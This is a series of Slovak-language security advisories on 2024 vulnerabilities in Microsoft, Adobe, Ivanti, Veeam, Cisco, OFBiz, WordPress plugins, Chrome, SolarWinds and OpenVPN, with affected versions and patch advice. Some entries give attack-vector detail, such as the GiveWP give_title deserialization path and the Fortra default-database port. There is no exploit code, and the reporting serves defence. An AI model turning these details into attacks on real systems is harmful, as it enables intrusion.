Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)

Opis činnosti:

Kritické zraniteľnosti:

CVE-2024-43491 (CVSS skóre 9,8)

Kritická zraniteľnosť v komponente Windows Update spočíva v použití odalokovaného miesta v pamäti a vzdialený neautentifikovaný útočník by ju prostredncítvom zaslania špeciálne vytvorenej požiadavky mohol zneužiť na vykonanie škodlivého kódu. Zraniteľnosť je v súčasnosti aktívne zneužívaná útočníkmi.

CVE-2024-38018 (CVSS skóre 8,8), CVE-2024-43464 (CVSS skóre 7,2)

Zraniteľnosti v produkte Microsoft SharePoint spočívajú v deserializácii nedôveryhodných dát a umožňujú vzdialené vykonanie škodlivého kódu.

Pre úspešné zneužitie CVE-2024-38018 musí útočník disponovať oprávneniami úrovne „Site Member“ a vyššie.

Zraniteľnosť s označením CVE-2024-43464 vyžaduje oprávnenia úrovne „Site Owner“ a vyššie a je možné zneužiť nahraním špeciálne vytvoreného súboru a následným zaslaním špeciálne vytvorenej API požiadavky, ktorá vedie k deserializácii parametrov tohto súboru.

CVE-2024-38119 (CVSS skóre 7,5)

Komponent Windows Network Address Translation obsahuje zraniteľnosť spočívajúcu v použití odalokovaného miesta v pamäti, ktorú možno zneužiť na vykonanie škodlivého kódu. Zneužitie zraniteľnosti vyžaduje, aby sa útočník nachádzal v rovnakom sieťovom segmente.

CVE-2024-38194 (CVSS skóre 8,4)

Zraniteľnosť v Azure Web Apps spočíva v nesprávnom overovaní vstupov a vzdialený autentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií. Zraniteľnosť bola opravená spoločnosťou Microsoft a nie je potrebná ďalšia aktivita zo strany používateľov.

CVE-2024-38220 (CVSS skóre 9,0), CVE-2024-38216 (CVSS skóre 8,2)

Zraniteľnosti v Azure Stack Hub (CVE-2024-38220, CVE-2024-38216) spočívajú v nesprávnom overovaní vstupov a vzdialený autentifikovaný útočník by ich mohol zneužiť na eskaláciu privilégií a získanie neoprávneného prístupu k systémovým zdrojom. Zneužitie zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí iniciovať spojenie

Aktívne zneužívané zraniteľnosti:

Aktívne zneužívané zraniteľnosti sa nachádzajú v produkte Microsoft Publisher (CVE-2024-38226), komponentoch Windows Installer (CVE-2024-38014) a Windows Update (CVE-2024-43491) a bezpečnostnom mechanizme Mark of the Web (CVE-2024-38217). Uvedené zraniteľnosti možno zneužiť na vzdialené vykonanie kódu, eskaláciu privilégií a obídenie bezpečnostných mechanizmov SmartScreen.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Zneprístupnenie služby
Obídenie bezpečnostného prvku
Spoofing

Odporúčania:

Bezodkladné nasadenie augustového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete tu.

Zdroje:

Bezpečnostné zraniteľnosti v produktoch Adobe

Marian Danko — Thu, 12 Sep 2024 09:24:53 +0000

Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty Media Encoder, Audition, After Effects, Premiere Pro, Illustrator, Acrobat Reader, ColdFusion a Photoshop, ktoré opravujú 29 zraniteľností, z čoho 19 sú označené ako kritické. Najzávažnejšie zraniteľnosti by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvorených súborov mohol zneužiť na vzdialené vykonanie škodlivého kódu. Ostatné zraniteľnosti možno zneužiť na získanie neoprávneného prístupu k citlivým údajom, vykonanie neoprávnených zmien v systéme a zneprístupnenie služby.

Zraniteľné systémy:

Adobe Media Encoder vo verziách starších ako 24.6
Adobe Media Encoder vo verziách starších ako 23.6.9
Adobe Audition vo verziách starších ako 24.6
Adobe Audition vo verziách starších ako 23.6.9
Adobe After Effects vo verziách starších ako 24.6
Adobe After Effects vo verziách starších ako 23.6.9
Adobe Premiere Pro vo verziách starších ako 24.6
Adobe Premiere Pro vo verziách starších ako 23.6.9
Adobe Illustrator 2024 vo verziách starších ako 28.7.1
Adobe Illustrator 2024 vo verziách starších ako 27.9.6
Acrobat DC vo verziách starších ako 24.003.20112
Acrobat Reader DC vo verziách starších ako 24.003.20112
Acrobat 2024 vo verziách starších ako 24.001.30187
Acrobat 2020 vo verziách starších ako 20.005.30680
Acrobat Reader 2020 vo verziách starších ako 20.005.30680
ColdFusion 2023 vo verziách starších ako Update 10
ColdFusion 2021 vo verziách starších ako Update 16
Photoshop 2023 vo verziách starších ako 24.7.5
Photoshop 2024 vo verziách starších ako 25.12

Opis zraniteľnosti:

Adobe ColdFusion

CVE-2024-41874 (CVSS skóre 9,8)

Najzávažnejšia kritická zraniteľnosť spočíva v deserializácii nedôveryhodných dát a možno ju zneužiť na vykonanie škodlivého kódu. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.

Adobe Media Encoder

CVE-2024-39377 (CVSS skóre 7,8), CVE-2024-41871 (CVSS skóre 5,5)

Zraniteľnosti umožňujúce čítanie a zápis mimo povolených hodnôt možno zneužiť na vykonanie škodlivého kódu.

Adobe Audition

CVE-2024-39378 (CVSS skóre 7,8)

CVE-2024-39378 možno zneužiť na zápis mimo povolených hodnôt možno zneužiť na vykonanie škodlivého kódu.

Adobe After Effects

CVE-2024-39380, CVE-2024-39381, CVE-2024-41859 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v zápise mimo povolených hodnôt a pretečení medzipamäte haldy umožňujú vykonanie škodlivého kódu.

Adobe Premiere Pro

CVE-2024-39384 (CVSS skóre 7,8)

Zraniteľnosť spočívajúcu v zápise mimo povolených hodnôt možno zneužiť na vykonanie škodlivého kódu.

Adobe Premiere Pro

CVE-2024-41857, CVE-2024-34121, CVE-2024-41856, CVE-2024-45114, CVE-2024-43758 (CVSS skóre 7,8)

Zraniteľnosti spočívajú v nesprávnom overovaní vstupov, zápise mimo povolené hodnoty, použití odalokovaného miesta v pamäti a v pretečení a podtečení celočíselnej premennej a umožňujú vykonanie škodlivého kódu.

Adobe Premiere Pro

CVE-2024-45112 (CVSS skóre 8,6), CVE-2024-41869 (CVSS skóre 7,8)

CVE-2024-45112 spočíva v nesprávnom určení dátových typov pri prístupe k zdrojom zariadenia a CVE-2024-41869 v použití odalokovaného miesta v pamäti. Obe zraniteľnosti umožňujú vykonanie kódu.

Adobe Photoshop

CVE-2024-43756, CVE-2024-43760, CVE-2024-45108, CVE-2024-45109 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v zápise mimo povolených hodnôt a pretečení medzipamäte haldy umožňujú vykonanie škodlivého kódu.

Zneužitie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí stiahnuť a otvoriť špeciálne vytvorené súbory.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Zneprístupnenie služby

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov.

Zdroje:

Bezpečnostné zraniteľnosti v produkte Ivanti Endpoint Management

Marian Danko — Thu, 12 Sep 2024 09:23:05 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 16 bezpečnostných zraniteľností v produkte Endpoint Manager, z čoho 10 je označených ako kritických. Kritické zraniteľnosti možno zneužiť na vykonanie škodlivého kódu a získanie úplnej kontroly nad systémom. Ostatné zraniteľnosti možno zneužiť na eskaláciu privilégií, získanie neoprávneného prístupu k citlivým údajom a vykonanie neoprávnených zmien v systéme.

Zraniteľné systémy:

Ivanti Endpoint Manager 2022 vo verziách starších ako 2022 SU6
Ivanti Endpoint Manager 2024 bez bezpečnostných záplat z júla a septembra 2024

Opis zraniteľnosti:

CVE-2024-29847 (CVSS skóre 10,0)

Najzávažnejšia zraniteľnosť s označením CVE-2024-29847 spočíva v deserializácii nedôveryhodných dát a vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorenej požiadavky mohol zneužiť na vzdialené vykonanie kódu na core serveri.

CVE-2024-32840, CVE-2024-32842, CVE-2024-32843, CVE-2024-32845, CVE-2024-32846, CVE-2024-32848, CVE-2024-34779, CVE-2024-34783, CVE-2024-34785 (CVSS skóre 9,1)

Bližšie nešpecifikované zraniteľnosti by vzdialený autentifikovaný útočník s oprávneniami administrátora mohol zneužiť na realizáciu SQL injekcie vedúcej k vzdialenému vykonaniu škodlivého kódu.

CVE-2024-37397 (CVSS skóre 8,2)

XXE (External XML Entity) zraniteľnosť možno zneužiť na získanie neoprávneného prístupu k citlivým údajom z API.

CVE-2024-8191 (CVSS skóre 7,8)

Zraniteľnosť v manažmentovom rozhraní možno prostredníctvom SQL injekcie zneužiť na vzdialené vykonanie škodlivého kódu. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme

Odporúčania:

Výrobca odporúča používať len verzie s platnou technickou podporou a zasiahnuté systémy bezodkladne aktualizovať na najnovšie verzie. Konkrétne verzie produktov a návod na inštláciu aktualizácií môžete nájsť na stránky výrobcu v časti Zdroje.

Zdroje:

https://forums.ivanti.com/s/article/Security-Advisory-EPM-September-2024-for-EPM-2024-and-EPM-2022

https://exchange.xforce.ibmcloud.com/vulnerabilities/358737

https://www.bleepingcomputer.com/news/security/ivanti-fixes-maximum-severity-rce-bug-in-endpoint-management-software/

Kritické zraniteľnosti v produktoch Veeam

Marian Danko — Fri, 06 Sep 2024 15:06:03 +0000

Spoločnosť Veeam opravila kritické zraniteľnosti v produktoch Backup & Replication (VBR), ONE, Service Provider Console a ďalších. Najzávažnejšia z nich umožňuje neautentifikovanému útočníkovi vzdialene vykonávať kód vo VBR. V balíku opráv spoločnosť vyriešila aj viacero ďalších vysoko závažných zraniteľností.

Zraniteľné systémy:

Veeam Backup & Replication 12.1.2.172 a staršie verzie 12.x.x.x
Veeam Service Provider Console 8.1.0.19552 a staršie verzie 8.x.x.x
Veeam ONE 12.1.0.3208 a staršie verzie 12.x.x.x
Veeam Agent for Linux 6.1.2.1781 a staršie verzie 6.x.x.x
Veeam Backup for Nutanix AHV Plug-In 12.5.1.8 a staršie verzie 12.x.x.x
Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.4.1.45 a staršie verzie 12.x.x.x

Opis zraniteľnosti:

Veeam Backup & Replication

Kritickú zraniteľnosť CVE-2024-40711 (CVSSv3.1 skóre 9,8) môže neautentifikovaný útočník zneužiť na vzdialené vykonávanie kódu.

Patch opravuje aj ďalšie vysoko závažné zraniteľnosti, ktoré umožňujú vzdialené vykonávanie kódu, získanie prihlasovacích údajov, manipuláciu so zálohami, či obchádzanie MFA.

Služba VRB je zaujímavým cieľom pre ransomvérové skupiny.

Service Provider Console

Kritická zraniteľnosť CVE-2024-38650 (CVSS skóre 9,9) umožňuje útočníkovi s nízkymi oprávneniami získať NTLM hash k servisnému účtu servera VSPC.

Kritická zraniteľnosť CVE-2024-39714 (CVSS skóre 9,9) umožňuje útočníkovi s nízkymi oprávneniami nahrávať súbory na server, a tak vzdialene vykonávať kód.

Patch opravuje aj ďalšie vysoko závažné zraniteľnosti, ktoré umožňujú vzdialené vykonávanie kódu.

ONE

Kritická zraniteľnosť CVE-2024-42024 (CVSS skóre 9,1) umožňuje vykonávať kód na hostiteľskom systéme. Útočník potrebuje prihlasovacie údaje k účtu ONE Agent.

Kritická zraniteľnosť CVE-2024-42019 (CVSS skóre 9,0) dovoľuje získať NTLM hash k účtu Reporter Service, pokiaľ útočník predtým získal potrebné údaje z VBR.

Patch opravuje aj ďalšie vysoko závažné zraniteľnosti, ktoré umožňujú vzdialené vykonávanie kódu, získanie prihlasovacích údajov a manipuláciu so súbormi.

Agent for Linux

Veeam opravila vysoko závažnú zraniteľnosť CVE-2024-40709 umožňujúcu lokálnemu útočníkovi s nízkymi oprávneniami získať oprávnenia používateľa root.

Veeam Backup for Nutanix AHV a Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization

Veeam opravila vysoko závažnú zraniteľnosť CVE-2024-40718 typu SSRF, umožňujúcu lokálnemu útočníkovi s nízkymi oprávneniami získať vyššie oprávnenia.

Možné škody:

Vzdialené vykonávanie kódu
Únik citlivých informácií
Eskalácia privilégií

Odporúčania:

Bezodkladná aktualizácia na

Veeam Backup & Replication 12.2.0.334
Veeam Service Provider Console 8.1.2.21377
Veeam ONE 12.2.0.4093
Veeam Agent for Linux 6.2.0.101
Veeam Backup for Nutanix AHV Plug-In 12.6.0.632
Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.5.0.229

Zdroje:

Cisco opravuje dve kritické zraniteľnosti v Smart Licensing Utility

Marian Danko — Fri, 06 Sep 2024 14:58:03 +0000

Aplikácia Cisco Smart Licensing Utility obsahuje dve kritické zraniteľnosti, ktoré umožňujú útočníkom získať prihlasovacie údaje pre prístup k API rozhraniu s administrátorskými oprávneniami.

Zraniteľné systémy:

Cisco Smart License Utility 2.0.0, 2.1.0 a 2.2.0

Opis zraniteľnosti:

Spoločnosť Cisco opravila dve kritické zraniteľnosti v nástroji Smart Licensing Utility. Aby bolo možné ich zneužiť, musí aplikácia bežať.

CVE-2024-20439 (CVSSv3 skóre 9,8)

Zraniteľnosť CVE-2024-20439 súvisí s implementovanými statickými prihlasovacími údajmi pre administrátorský účet. Útočník ich môže zneužiť pre získanie neautorizovaného prístupu do systému.

CVE-2024-20440 (CVSSv3 skóre 9,8)

Zraniteľnosť CVE-2024-20440 umožňuje útočníkovi pomocou špeciálnych HTTP požiadaviek získať logovacie súbory obsahujúce citlivé údaje, vrátane prihlasovacích údajov pre prístup k API rozhraniu aplikácie. Súvisí s ukladaním citlivých informácií do súboru debug logu.

Možné škody:

Únik citlivých informácií
Kompromitácia aplikácie

Odporúčania:

Bezodkladná aktualizácia na Cisco Smart License Utility 2.3.0.

Zdroje:

Kritická zraniteľnosť v Apache Open For Business

Marian Danko — Fri, 06 Sep 2024 14:47:01 +0000

V aplikácii Apache Open For Business bola opravená kritická zraniteľnosť umožňujúca vzdialené vykonávanie kódu bez potreby autentifikácie. Súvisí s nedostatočným overením oprávnení používateľa, ktorý sa pokúša priamo pristúpiť ku chráneným zdrojom.

Zraniteľné systémy:

Apache OFBiz verzie staršie ako 18.12.16

Opis zraniteľnosti:

CVE-2024-45195 (CVSSv3 skóre 7,5)

Apache opravil kritickú zraniteľnosť v open-source aplikácii OFBiz (Open For Business). Zraniteľnosť CVE-2024-45195 súvisí s nedostatočnou kontrolou oprávnení pre zabezpečené zdroje, čo umožňuje získať k nim prístup priamou požiadavkou. Neautentifikovanému útočníkovi umožňuje vzdialene vykonávať kód na serveri.

Zraniteľnosť obchádza opravu troch predchádzajúcich, ktoré vychádzajú z tej istej chyby (CVE-2024-32113, CVE-2024-36104, CVE-2024-38856). Objavili ju výskumníci spoločnosti Rapid7.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia na Apache OFBiz 18.12.16.

Zdroje:

Mesačný prehľad kritických zraniteľností august 2024

Marian Danko — Tue, 03 Sep 2024 15:14:59 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci august 2024.

Mesačný prehľad – 08/2024 PDF (667 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Kritická zraniteľnosť FORTRA FileCatalyst Workflow

Marian Danko — Fri, 30 Aug 2024 11:06:32 +0000

Fortra FileCatalyst Workflow obsahuje kritickú zraniteľnosť, ktorá umožňuje vzdialeným útočníkom administrátorský prístup ku prednastavenej databáze softvéru, čím môžu získať úplnú kontrolu nad zraniteľnou webovou aplikáciou.

Zraniteľné systémy:

FileCatalyst Workflow 5.1.6 Build 139 a staršie

Opis činnosti:

CVE-2024-6633 (CVSS skóre 9,8)

Kritická zraniteľnosť FileCatalyst Workflow umožňuje kvôli prednastaveným prihlasovacím údajom pre konfiguráciu databázy HSQL, zverejneným na webstránkach spoločnosti Fortra, získať vzdialenému útočníkovi administratívny prístup k nej. Následne si v nej môžu napríklad vytvoriť konto pre webovú aplikáciu s administrátorskými oprávneniami. Štandardne je databáza prístupná na TCP porte 4406.

Spoločnosť túto databázu odporúča používať len v rámci inštalácie softvéru a následne prepojiť produkčnú inštanciu softvéru s inou databázou, na to určenou. Používatelia však toto odporúčanie v niektorých prípadoch ignorujú.

Zraniteľnosť objavili výskumníci zo spoločnosti Tenable.

Možné škody:

Získanie kontroly nad zraniteľnou databázou

Odporúčania:

Bezodkladná aktualizácia FileCatalyst Workflow na verziu 5.1.7 alebo novšiu.
Pre mitigáciu zraniteľnosti nepoužívajte v produkčnej inštalácii FileCatalyst Workflow prednastavenú databázu. Pripojte k nej inú databázu.

Odkazy:

Kritická zraniteľnosť v doplnku WordPress WPML

Marian Danko — Fri, 30 Aug 2024 10:58:49 +0000

Vývojári populárneho doplnku WordPress WPML slúžiaceho na vytváranie viacjazyčných stránok vydali bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť. Zraniteľnosť s označením CVE-2024-6386 umožňuje vykonanie škodlivého kódu a získanie úplnej kontroly nad inštanciou redakčného systému WordPress.

Zraniteľné systémy:

WordPress doplnok WPML vo verzii staršej ako 4.6.13

Opis zraniteľnosti:

CVE-2024-6386 (CVSS skóre 9,9)

Zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov v rámci šablón Twig a vzdialený autentifikovaný útočník s oprávneniami Contributor by ich mohol zneužiť na realizáciu útokov SSTI (Server Side Template Injection) vedúcich k vykonaniu škodlivého kódu. Na uvedenú zraniteľnosť je v súčasnosti verejne dostupný proof-of-concept kód demonštrujúci návod na jej zneužitie.

Možné škody:

Vykonanie škodlivého kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu doplnku WPML na verziu 4.6.13 a novšiu. V rámci preventívnych opatrení odporúčame pravidelnú aktualizáciu redakčného systému a všetkých používaných pluginov.

Zdroje:

Aktívne zneužívaná zraniteľnosť v Google Chrome

Marian Danko — Tue, 27 Aug 2024 09:07:10 +0000

Spoločnosť Google vydala bezpečnostné aktualizácie na svoj webový prehliadač Chrome, ktoré opravujú 19 zraniteľností. Najzávažnejšie zraniteľnosti v komponentoch V8, Passwords, Skia, Fonts a Autofill možno zneužiť umožňujú vzdialené vykonanie kódu a zneprístupnenie služby. Zraniteľnosť s označením CVE-2024-7965 je aktívne zneužívaná útočníkmi.

Zraniteľné systémy:

Google Chrome pre Windows a Mac verzie staršej ako 128.0.6613.84/.85
Google Chrome pre Linux verzie staršej ako 128.0.6613.84

Opis zraniteľnosti:

CVE-2024-7971 (CVSS skóre 8.8) a CVE-2024-7965 (CVSS skóre 6.5)

Nesprávna implementácia bezpečnostných mechanizmov (CVE-2024-7965) a nesprávne vyhodnocovanie typov (CVE-2024-7971) v komponente V8 by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvoreného webového obsahu mohol zneužiť na obídenie bezpečnostných prvkov a vykonanie škodlivého kódu. Na obe zraniteľnosti je v súčasnosti dostupný proof-of-concept kód demonštrujúci návod na ich zneužitie. Zraniteľnosť s označením CVE-2024-7965 je podľa spoločnosti Google aktívne zneužívaná útočníkmi.

CVE-2024-7964, CVE-2024-7968 (CVSS skóre 8.8)

Zraniteľnosti v komponentoch Passwords a Autofill spočívajú v použití odalokovaného miesta v pamäti a možno ich zneužiť vzdialené vykonanie škodlivého kódu.

CVE-2024-7966 (CVSS skóre 8.8)

Komponent Skia obsahuje zraniteľnosť umožňujúcu prístup k obsahu pamäti mimo povolených hodnôt, ktorá umožňuje vzdialené vykonanie kódu.

CVE-2024-7967 (CVSS skóre 8.8)

Pretečením zásobníka haldy v komponente Fonts možno spôsobiť pád prehliadača alebo vykonať škodlivý kód.

Zneužitie všetkých vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorený webový obsah.

Možné škody:

Vykonanie škodlivého kódu
Zneprístupnenie služby
Obídenie bezpečnostných prvkov

Odporúčania:

Odporúčame aktualizáciu prehliadača Chrome pre Windows a Mac aspoň na verziu 128.0.6613.84/.85 a Linux verzie aspoň na verziu 128.0.6613.84.

Zdroje:

Kritické zraniteľnosti v produkte SolarWinds

Marian Danko — Fri, 23 Aug 2024 13:08:46 +0000

Spoločnosť SolarWinds vydala bezpečnostné aktualizácie pre službu Web Help Desk (WHD), ktoré opravujú kritické zraniteľnosti s označením CVE-2024-28986 a CVE-2024-228987. Vzdialený útočník ich môže zneužiť na vzdialené vykonávanie kódu a neoprávnený prístup do systému.

Zraniteľné systémy:

WHD 12.4;
WHD 12.5;
WHD 12.6;
WHD 12.7;
WHD 12.8

Opis činnosti:

CVE-2024-28986 (CVSS skóre 9,8)

Kritická zraniteľnosť CVE-2024-28986 bola objavená v službe Web Help Desk a umožňuje vzdialené vykonávanie kódu. Chyba súvisí s deseralizáciou jazyka Java a umožňuje neautentifikovanému útočníkovi spustiť príkazy na zraniteľnom hostiteľskom počítači.

Deserializácia je proces transformácie uložených dát do objektov, s ktorými dokáže program pracovať.

Spoločnosť SolarWinds uvádza, že CVE-2024-28986 bola nahlásená ako zraniteľnosť, ktorú bolo možné zneužiť bez potreby autentifikácie, ale jej inžinieri ju dokázali reprodukovať až po autentifikácii.

Zraniteľnosť CVE-2024-28986 je aktívne zneužívaná.

CVE-2024-28986 (CVSS skóre 9,1)

Druhá kritická zraniteľnosť spočíva v existencii zabudovaných používateľských účtov s predvoleným heslom, ktoré by vzdialený neautentifikovaný útočník mohol zneužiť na získanie neoprávneného prístupu do systému a následne využiť interné funkcionality nástroja a modifikovať dáta.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vzdialené vykonávanie kódu
Neoprávnený prístup do systému

Odporúčania:

Výrobca odporúča vykonať bezodkladnú aktualizáciu WHD na verziu 12.8.3 a následnú inštaláciu hotfixov HF1 a HF2. Nakoľko počas aplikovania hotfixov dochádza k modifikácii súborov, SolarWinds odporúča vytvoriť záložné kópie pôvodných súborov, aby sa predišlo prípadným problémom v prípade, že hotfixy neboli aplikované správne. Celý postup nájdete tu a tu.

Odkazy:

https://www.bleepingcomputer.com/news/security/solarwinds-fixes-critical-rce-bug-affecting-all-web-help-desk-versions/

https://support.solarwinds.com/SuccessCenter/s/article/WHD-12-8-3-Hotfix-1

https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2

https://nvd.nist.gov/vuln/detail/CVE-2024-28986

https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987

Kritická zraniteľnosť v module WordPress GiveWP

Marian Danko — Fri, 23 Aug 2024 12:53:26 +0000

Modul WordPress GiveWP, ktorý poskytuje možnosť vytvorenia darcovského rozhrania na webstránkach, obsahuje kritickú zraniteľnosť súvisiacu s nedostatočným overovaním používateľských vstupov. Jej zneužitím dokáže útočník vzdialene vykonávať kód a mazať súbory. Môže získať úplnú kontrolu nad zraniteľnou inštanciou WordPress.

Zraniteľné systémy:

WordPress GiveWP, verzia 3.14.1 a staršie

Opis činnosti:

CVE-2024-5932 (CVSS v 3.1 skóre 10,0)

GiveWP je modul, ktorý predstavuje riešenie pre vytvorenie darcovskej služby na weboch postavených na redakčnom systéme WordPress. Vývojári pluginu vydali bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť. CVE-2024-5932 by vzdialený neautentifikovaný útočník prostredníctvom deserializácie obsahu parametra give_title mohol zneužiť na vzdialené vykonanie kódu alebo odstránenie ľubovoľných súborov. Problém sa nachádza vo funkcii pre kontrolu používateľských vstupov z darcovského formulára give_process_donation_form(), ktorá parameter give_title vynecháva z validácie a sanitizácie. Útočník tak dokáže cez formulár injektovať objekt PHP. V prípade vymazania konfiguračného súboru wpconfig.php by útočník mohol získať úplnú kontrolu nad systémom.

Závažnosť zraniteľnosti: Vysoká

Možné škody:

Vzdialené vykonávanie kódu
Získanie kontroly nad zraniteľným systémom
Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia GiveWP aspoň na verziu 3.14.2.

Odkazy:

https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/

https://thehackernews.com/2024/08/givewp-wordpress-plugin-vulnerability.html

https://feedly.com/cve/CVE-2024-5932

Viete čo je OSINT? [Infografika]

Marian Danko — Fri, 16 Aug 2024 09:07:30 +0000

Pripravili sme si pre Vás infografiku o Open Source Intelligence (OSINT). OSINT predstavuje kľúčový nástroj na získavanie a overovanie informácií z verejne dostupných zdrojov, čo hrá dôležitú úlohu nielen v investigatívnej práci, ale aj v oblasti kybernetickej bezpečnosti. Viete, aké sú hlavné výhody OSINT a aké výzvy môže priniesť?

Infografika- OSINT (PDF)

Všetky naše infografiky si môžete pozrieť tu.

Microsoft odhalil bezpečnostné zraniteľnosti v OpenVPN

Marian Danko — Fri, 16 Aug 2024 08:28:06 +0000

Bezpečnostní výskumníci zo spoločnosti Microsoft na hackerskej konferencii Black Hat USA 2024 zverejnili informácie o 4 zraniteľnostiach OpenVPN, ktorých zreťazením by vzdialený útočník mohol získať úplnú kontrolu nad systémom. Vývojári OpenVPN zraniteľnosti opravili ešte v marci 2024 vydaním verzie 2.6.10.

Zraniteľné systémy:

OpenVPN vo verzii staršej ako 2.6.10 (aktuálna verzia 2.6.12)

Opis zraniteľnosti:

CVE-2024-27459 (CVSSv3 skóre 7.8)

Zraniteľnosť spočíva v nesprávnej implementácii načítavania veľkosti správ v rámci komunikácie medzi procesom openvpn.exe a službou openvpnserv.exe, ktorou možno vyvolať pretečenie zásobníka.

CVE-2024-24974 (CVSSv3 skóre 7.5 )

CVE-2024-24974 sa nachádza v openvpnserv.exe a umožňuje prístup k prostriedkom operačného systému.

CVE-2024-27903 (CVSSv3 skóre 7.2 )

Nedostatočná implementácia bezpečnostných mechanizmov umožňuje načítavanie OpenVPN pluginov z ľubovoľného adresára. Útočník by predmetnú zraniteľnosť mohol zneužiť na načítanie škodlivých pluginov.

CVE-2024-1305 (CVSSv3 skóre 7.8)

Zraniteľnosť nachádzajúca sa v ovládači tap-windows6 spočíva v nesprávnom overovaní parametrov PacketLength a PrefixLength v rámci metódy TapDeviceWrite a vzdialený útočník by ju mohol zneužiť na pretečenia medzipamäte a následné vykonanie škodlivého kódu.

Zreťazením uvedených zraniteľností možno dosiahnuť eskaláciu privilégií a vzdialané vykonanie škodlivého kódu vedúce k získaniu úplnej kontroly nad systémom.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Zneprístupnenie služby

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladnú aktualizáciu OpenVPN na verziu 2.6.10 alebo novšiu.

Zdroje:

https://www.microsoft.com/en-us/security/blog/2024/08/08/chained-for-attack-openvpn-vulnerabilities-discovered-leading-to-rce-and-lpe/

https://forums-new.openvpn.net/forum/announcements/69-release-openvpn-version-2-6-10

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27459

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24974

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27903

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1305

Microsoft v rámci augustového Patch Tuesday opravil 9 kritických zraniteľností

Marian Danko — Thu, 15 Aug 2024 10:47:52 +0000

Spoločnosť Microsoft vydala v auguste 2024 balík opráv pre portfólio svojich produktov opravujúci 90 zraniteľností, z ktorých 24 umožňuje vzdialené vykonávanie kódu. Kritické zraniteľnosti sa nachádzajú v produktoch Microsoft Dynamics 365, Microsoft Copilot Studio a Azure Health Bot a v komponentoch grub2, shim, Windows TCP/IP, Windows Reliable Multicast Transport Driver a Windows Network Virtualization. Zraniteľnosti s označením CVE-2024-38189, CVE-2024-38178, CVE-2024-38193, CVE-2024-38106, CVE-2024-38107 a CVE-2024-38213 sú aktívne zneužívané útočníkmi.

Zraniteľné systémy:

.NET 8.0
App Installer
Azure Connected Machine Agent
Azure CycleCloud 8.0.0
Azure CycleCloud 8.0.1
Azure CycleCloud 8.0.2
Azure CycleCloud 8.1.0
Azure CycleCloud 8.1.1
Azure CycleCloud 8.2.0
Azure CycleCloud 8.2.1
Azure CycleCloud 8.2.2
Azure CycleCloud 8.3.0
Azure CycleCloud 8.4.0
Azure CycleCloud 8.4.1
Azure CycleCloud 8.4.2
Azure CycleCloud 8.5.0
Azure CycleCloud 8.6.0
Azure CycleCloud 8.6.1
Azure CycleCloud 8.6.2
Azure Health Bot
Azure IoT Hub Device Client SDK
Azure Linux 3.0 ARM
Azure Linux 3.0 x64
Azure Stack Hub
